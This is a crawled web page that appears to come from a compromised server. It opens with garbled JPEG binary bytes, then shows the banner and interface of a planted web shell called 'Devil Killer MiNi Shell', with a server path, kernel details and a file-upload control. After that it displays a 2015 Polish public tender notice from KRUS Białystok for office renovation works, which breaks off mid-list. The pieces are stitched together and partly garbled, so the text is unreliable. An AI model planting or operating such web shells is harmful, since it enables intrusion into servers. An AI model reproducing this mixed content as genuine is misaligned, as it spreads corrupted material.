JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150810/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150810/118723-N-2015.html

<p class="kh_header"><b>Białystok: Roboty budowlane 
polegające na remoncie pomieszczeń i wykonaniu innych drobnych prac w Oddziale Regionalnym KRUS w Białymstoku i Placówkach Terenowych KRUS w Augustowie, Dąbrowie Białostockiej, Grajewie, Hajnówce, Mońkach, Siemiatyczach, Suwałkach, Wysokiem Mazowieckiem</b><br>
<b>Numer ogłoszenia: 118723 - 2015; data zamieszczenia: 10.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Białymstoku , ul. Legionowa 18, 15-099 Białystok, woj. podlaskie, tel. 85 7497300, faks 85 7497310.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.krus.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane 
polegające na remoncie pomieszczeń i wykonaniu innych drobnych prac w Oddziale Regionalnym KRUS w Białymstoku i Placówkach Terenowych KRUS w Augustowie, Dąbrowie Białostockiej, Grajewie, Hajnówce, Mońkach, Siemiatyczach, Suwałkach, Wysokiem Mazowieckiem.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są roboty budowlane polegające na remoncie pomieszczeń i wykonaniu innych drobnych prac w podziale na TRZY CZĘŚCI. Przedmiotowe roboty prowadzone będą w obiektach KRUS w:
1)	OR KRUS w Białymstoku, ul. Legionowa 18, 19-099 Białystok,
2)	PT KRUS w Augustowie, ul. Młyńska 29, 16-300 Augustów,
3)	PT KRUS w Dąbrowie Białostockiej, ul. Wesoła 23, 16-200 Dąbrowa Białostocka,
4)	PT KRUS w Grajewie, ul. Osiedle Centrum 28A, 19-200 Grajewo,
5)	PT KRUS w Hajnówce, ul. Armii Krajowej 16, 17-200 Hajnówka,
6)	PT KRUS w Mońkach, ul. Tysiąclecia 19A, 19-100 Mońki,
7)	PT KRUS w Siemiatyczach, ul. Pałacowa 23, 17-300 Siemiatycze,
8)	PT KRUS w Suwałkach, ul. Utrata 4C, 16-400 Suwałki,
9)	PT KRUS w Wysokiem Mazowieckiem, Pl. Odrodzenia 9, 18-200 Wysokie Mazowieckie.
2.	Szczegółowy opis przedmiotu zamówienia zawierają załączniki do SIWZ. 
3.	Prace objęte przedmiotem zamówienia będą realizowane w godzinach pracy jednostek KRUS (w dniach od poniedziałku do piątku z wyłączeniem świąt w godzinach od 7:30 do 15:30) po uprzednim uzgodnieniu z Zamawiającym frontu robót. Dopuszcza się możliwość realizacji umowy poza godzinami pracy po uprzednim uzyskaniu zgody Kierownika Placówki lub innej wyznaczonej osoby, w której prowadzony jest remont.
4.	Prace objęte zamówieniem muszą być realizowane kompleksowo w taki sposób, aby jak najmniej zakłócać bieżącą pracę pracowników jednostek KRUS oraz obsługę interesantów, tj. malowanie i wymiana wykładzin podłogowych w poszczególnych pokojach biurowych musi następować bezpośrednio po sobie, aby czas wyłączenia pomieszczenia z użytkowania był jak najkrótszy. 
5.	Oprócz wykonania robót budowlanych, do obowiązków Wykonawcy należeć będzie w szczególności:
1)	przed wykonaniem prac remontowych: wyniesienie znajdujących się w pomieszczeniach szaf, biurek, regałów i innych mebli wraz z ich demontażem, jeśli konstrukcja mebli tego wymaga, demontaż innych elementów wyposażenia pokoi, jeżeli jest on niezbędny do wykonania prowadzonych prac (ewentualnie ich przestawienie, jeżeli istnieje możliwość pozostawienia mebli i wyposażenia w pomieszczeniu) oraz zabezpieczenie ich folią,
2)	po wykonaniu prac remontowych: wniesienie usuniętych szaf, biurek, regałów i innych mebli wraz z ich montażem, jeśli zostały rozmontowane, i ustawienie w miejscach wskazanych przez użytkowników pokoi, montaż innych elementów wyposażenia, jeśli były zdemontowane. Wykonawca będzie zobowiązany do naprawy na własny koszt mebli lub wyposażenia, jeżeli w trakcie ich demontażu, wynoszenia, wnoszenia, montażu lub ustawiania zostaną uszkodzone. 
3)	po zakończeniu ww. prac w danym pomieszczeniu: odkurzanie wykładzin, umycie i wyczyszczenie z użyciem odpowiednich środków czyszczących posadzek, stolarki drzwiowej i okiennej z szybami włącznie, parapetów, kaloryferów, szaf, biurek, regałów i innych mebli oraz wyposażenia pokoi (z wyłączeniem sprzętu komputerowego), tak aby pracownicy po wejściu do pomieszczeń mogli bez przeszkód przystąpić do pracy bieżącej.
4)	w trakcie wykonywania prac remontowych Wykonawca ma obowiązek utrzymywania porządku i czystości ciągów komunikacyjnych, aby nie dopuszczać do zabrudzeń wykładzin podłogowych w pomieszczeniach oddanych do użytku po remoncie. 
6.	Zamawiający zaleca przeprowadzić wizję lokalną w celu uzyskania wszelkich informacji niezbędnych do prawidłowego przygotowania oferty, po wcześniejszym uzgodnieniu terminu wizyty. Osobami upoważnionymi do kontaktowania się z wykonawcami w sprawie wizji lokalnej są: 
1)	w Oddziale Regionalnym KRUS w Białymstoku, Pan Bogdan Korolczuk - kierownik Wydziału Administracyjno- Gospodarczego, tel. 85 749 73 56, 
2)	w Placówce Terenowej KRUS w Augustowie, Pani Beata Maria Malinowska - kierownik PT, tel. 87 644 67 14, 
3)	w Placówce Terenowej KRUS w Dąbrowie Białostockiej, Pani Zofia Danilewicz - Kierownik PT, tel. 85 712 14 86, 
4)	w Placówce Terenowej KRUS w Grajewie, Pani Marta Sztachelska - Kierownik PT, tel. 86 272 31 34, 
5)	w Placówce terenowej KRUS w Hajnówce, Pani Anna Kraśko - kierownik PT, tel. 85 682-60-90, 
6)	w Placówce Terenowej KRUS w Mońkach, Pani Elżbieta Kononiuk - Kierownik PT, tel. 85 716 59 03, 
7)	w Placówce Terenowej KRUS w Siemiatyczach, Pani Katarzyna Jakubiak - kierownik PT, tel. 85 655 34 33, 
8)	w Placówce Terenowej KRUS w Suwałkach, Pani Agnieszka Putra - Kierownik PT, tel. 87 566-65-19, 
9)	w Placówce Terenowej KRUS w Wysokiem Mazowieckiem, Pani Izabela Lutostańska, tel. 86 275 22 24. 
7.	Wykonawca musi udzielić co najmniej 36 miesięcznej gwarancji jakości na wykonane roboty, liczonej od daty odbioru przedmiotu zamówienia. W okresie gwarancyjnym Wykonawca zobowiązany będzie do nieodpłatengo usuwania i naprawy ewentualnych usterek lub wad. 
8.	Wszelkie nazwy materiałów określone w opisie przedmiotu zamówienia lub dokumentacji kosztorysowej należy rozumieć jako przykładowe o parametrach pożądanych przez Zamawiającego. Oznacza to, że Zamawiający dopuszcza użycie materiałów równoważnych pod względem parametrów technicznych i użytkowych, przy zachowaniu co najmniej tego samego poziomu jakości, trwałości i kompatybilności z pozostałymi materiałami użytymi przy realizacji zamówienia i obecnie funkcjonującymi. Podanie ewentualnie w opisach nazwy własne mają na celu jedynie sprecyzowanie oczekiwań jakościowych i technologicznych Zamawiającego. 
9.	Materiały i urządzenia użyte do wykonania przedmiotu zamówienia muszą posiadać deklaracje zgodności lub certyfikat zgodności z Polską Normą lub aprobatę techniczną - w przypadku braku Polskich Norm przenoszących europejskie normy zharmonizowane. Wykonawca wyłoniony w trybie przetargu do realizacji zamówienia na żądanie Zamawiającego, musi dostarczyć powyższe dokumenty przy odbiorze zamówienia. 
10.	Z chwilą przejęcia terenu remontu Wykonawca staje się właścicielem i posiadaczem odpadów, z którymi będzie postępował zgodnie z obowiązującymi przepisami, tj. ustawą z dnia 14.12.2012 r. o odpadach (Dz. U. z 2013 r., poz. 21 z późn. zm.) oraz ustawą z dnia 27.04.2001 r. Prawo ochrony środowiska (Dz. U. z 2013 r., poz. 1232 z późn. zm.).</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.11-5, 45.44.21.00-8, 45.45.30.00-7, 39.14.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego wymagania w zakresie ww. warunku. Ocena warunku będzie dokonywana na podstawie informacji zawartej w oświadczeniu dołączonym do oferty, którego wzór stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego wymagania w zakresie ww. warunku. Ocena warunku będzie dokonywana na podstawie informacji zawartej w oświadczeniu dołączonym do oferty, którego wzór stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego wymagania w zakresie ww. warunku. Ocena warunku będzie dokonywana na podstawie informacji zawartej w oświadczeniu dołączonym do oferty, którego wzór stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego wymagania w zakresie ww. warunku. Ocena warunku będzie dokonywana na podstawie informacji zawartej w oświadczeniu dołączonym do oferty, którego wzór stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowego wymagania w zakresie ww. warunku. Ocena warunku będzie dokonywana na podstawie informacji zawartej w oświadczeniu dołączonym do oferty, którego wzór stanowi załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony formularz ofertowy zgodny ze wzorem stanowiącym załącznik nr 1 do SIWZ, podpisany przez osobę prawidłowo umocowaną. Podpis musi być sporządzony w sposób umożliwiający identyfikację podpisu: czytelnie (imię i nazwisko) lub nieczytelnie (z imienną pieczątką).
2)	Pełnomocnictwo do reprezentowania Wykonawcy w niniejszym postępowaniu, o ile nie wynika ono z dokumentu rejestracyjnego (Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mają obowiązek ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego).
3)	W przypadku wykonywania części zamówienia przez podwykonawców - wykaz części zamówienia, których wykonanie Wykonawca powierzy podwykonawcom (wg załącznika nr 4 do SIWZ).
4)	Wykonawca, który będzie polegał na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie (wg załącznika nr 5 do SIWZ) tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia. Dokument zawierający zobowiązanie podmiotu trzeciego powinien wyrażać w sposób wyraźny i jednoznaczny wolę udzielenia Wykonawcy ubiegającemu się o zamówienie odpowiedniego zasobu. Z treści dokumentów musi wynikać:
a)	zakres dostępnych Wykonawcy zasobów innego podmiotu,
b)	sposób wykorzystania zasobów innego podmiotu przez Wykonawcę przy wykonywaniu zamówienia,
c)	charakter stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
d)	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin wykonania zamówienia (oddzielnie na każdą część zamówienia) - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w zakresie określonym we wzorze umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.krus.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Białymstoku, ul. Legionowa 18, 15-099 Białystok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.08.2015 godzina 10:00, miejsce: Kasa Rolniczego Ubezpieczenia Społecznego Oddział Regionalny w Białymstoku, ul. Legionowa 18, 15-099 Białystok, kancelaria Oddziału na parterze budynku.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Roboty budowlane w budynku biurowym będącym siedzibą Placówki Terenowej KRUS w Dąbrowie Białostockiej oraz garażu, położonych w Dąbrowie Białostockiej przy ul. Wesołej 23.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Roboty budowlane polegające na wykonaniu w budynku biurowym będącym siedzibą Placówki Terenowej KRUS w Dąbrowie Białostockiej oraz garażu, położonych w Dąbrowie Białostockiej przy ul. Wesołej 23, zadań obejmujących m.in.:  
a)	szpachlowanie, malowanie ścian wewnętrznych i sufitów oraz drobne prace remontowe we wskazanych pomieszczeniach budynku, montaż rolet, 
b)	zerwanie starych i wymianę na nowe wykładzin podłogowych we wskazanych pomieszczeniach budynku biurowego,
c)	prace remontowe przy garażu. 
2)	Szczegółowy opis części I zamówienia zawiera załącznik nr 8 do SIWZ - Przedmiar robót pn. Roboty budowlane w budynku biurowym Placówki Terenowej KRUS w Dąbrowie Białostockiej oraz garażu przy ul. Wesołej 23.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.11-5, 45.44.21.00-8, 45.45.30.00-7, 39.14.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Roboty budowlane w lokalu biurowym będącym siedzibą Placówki Terenowej KRUS w Suwałkach, położonym w Suwałkach przy ul. Utrata 4C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Roboty budowlane polegające na wykonaniu w lokalu biurowym będącym siedzibą Placówki Terenowej KRUS w Suwałkach, położonym w Suwałkach przy ul. Utrata 4C, zadań obejmujących m.in.: 
a)	szpachlowanie, malowanie ścian wewnętrznych i sufitów oraz drobne prace remontowe we wskazanych pomieszczeniach, montaż rolet, montaż skrzydeł drzwiowych,
b)	zerwanie starych i wymianę na nowe wykładzin podłogowych we wskazanych pomieszczeniach.
2)	Szczegółowy opis części II zamówienia zawiera załącznik nr 9 do SIWZ - Przedmiar robót pn. Roboty budowlane w lokalu biurowym Placówki Terenowej KRUS w KRUS w Suwałkach.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.11-5, 45.44.21.00-8, 45.45.30.00-7, 39.14.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. Termin wykonania zamówienia - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Roboty budowlane polegające na wykonaniu drobnych prac w pomieszczeniach oraz wokół obiektów jednostek OR KRUS w Białymstoku, PT KRUS w Augustowie, Grajewie, Hajnówce, Mońkach, Siemiatyczach, Wysokiem Mazowieckiem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Roboty budowlane polegające na wykonaniu drobnych prac w pomieszczeniach oraz wokół obiektów jednostek KRUS zadań obejmujących m.in.:
a)	OR KRUS w Białymstoku, ul. Legionowa 18: 
-	oczyszczenie i pomalowanie krat przy świetlikach,
-	obłożenie tynkiem mozaikowym murku przy świetlikach,
-	oczyszczenie i pomalowanie parapetów zewnętrznych parteru,
-	naprawa okładziny schodów i przymocowanie odpadających płytek podłoża tarasu, 
-	oczyszczenie z rdzy i malowanie ogrodzenia,
-	likwidacja pęknięcia płytek schodka zewnętrznego.
b)	PT KRUS w Augustowie, ul. Młyńska 29: 
-	oczyszczenie z wysoleń schodów zewnętrznych i podjazdów dla osób niepełnosprawnych, wymiana płytek, 
-	naprawa zapadniętej kostki betonowej przy podjeździe do garażu, 
-	pomalowanie elewacji garażu, 
-	wymiana oświetlenia w 3 pomieszczeniach placówki, 
-	remont WC, montaż muszli sedesowej w miejsce brodzika prysznicowego,  
-	remont 2 pomieszczeń na potrzeby pomieszczeń socjalnych obejmujący szpachlowanie, malowanie ścian wewnętrznych i sufitów, zerwanie starych i wymianę na nowe wykładzin podłogowych,
-	wykonanie i montaż mebli na wymiar w pomieszczeniach socjalnych, zgodnie z rysunkiem stanowiącym załącznik nr 11 do SIWZ.  
c)	PT KRUS w Grajewie, ul. Osiedle Centrum 28 A - uzupełnienie opaski z kamyczków przy budynku. 
d)	PT KRUS w Hajnówce, ul. Armii Krajowej 16: 
-	odtworzenie glazury w pomieszczeniu WC,
-	przerobienie instalacji sanitarnej w pomieszczeniu WC, 
-	wykonanie rewizji instalacji wody.   
e)	PT KRUS w Mońkach, ul. Tysiąclecia 19a:
